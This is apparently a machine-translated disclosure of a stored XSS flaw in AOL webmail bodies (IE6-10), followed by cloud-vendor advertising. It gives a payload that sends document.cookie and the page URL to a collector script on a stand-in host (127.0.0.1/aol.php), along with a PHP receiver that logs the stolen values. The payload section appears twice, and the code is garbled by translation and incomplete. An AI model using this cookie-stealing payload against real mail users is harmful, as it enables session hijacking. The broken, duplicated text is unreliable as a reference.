US online mail text storage type xss can be played blindly (first in various skills)
The US online mail body storage type xss can be played blindly! A variety of cool first! Affected Version ie6-10
Xss code:
<div style="display:none"></div>
Email receiving code:
<? Phpecho "new Image (). src = 'HTTP: // 127.0.0.1/aol. php? Mail?aol&cookie='{escape(document.cookie={'&url}'{escape(top.doc ument. location. href); "comment ', $ mail. "\ r \ n ". $ cookie. "\ r \ n ". $ url); function get ($ get) {// get escape function $ val =! Empty ($ _ GET [$ get])? $ _ GET [$ get]: null; return $ val ;}?>
Example:
Xss:
The US online mail body storage type xss can be played blindly! A variety of cool first! Affected Version ie6-10
Xss code:
<div style="display:none"></div>
Email receiving code:
<? Phpecho "new Image (). src = 'HTTP: // 127.0.0.1/aol. php? Mail?aol&cookie='{escape(document.cookie={'&url}'{escape(top.doc ument. location. href); "comment ', $ mail. "\ r \ n ". $ cookie. "\ r \ n ". $ url); function get ($ get) {// get escape function $ val =! Empty ($ _ GET [$ get])? $ _ GET [$ get]: null; return $ val ;}?>
Example:
Xss:
Solution:
Various Filters
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
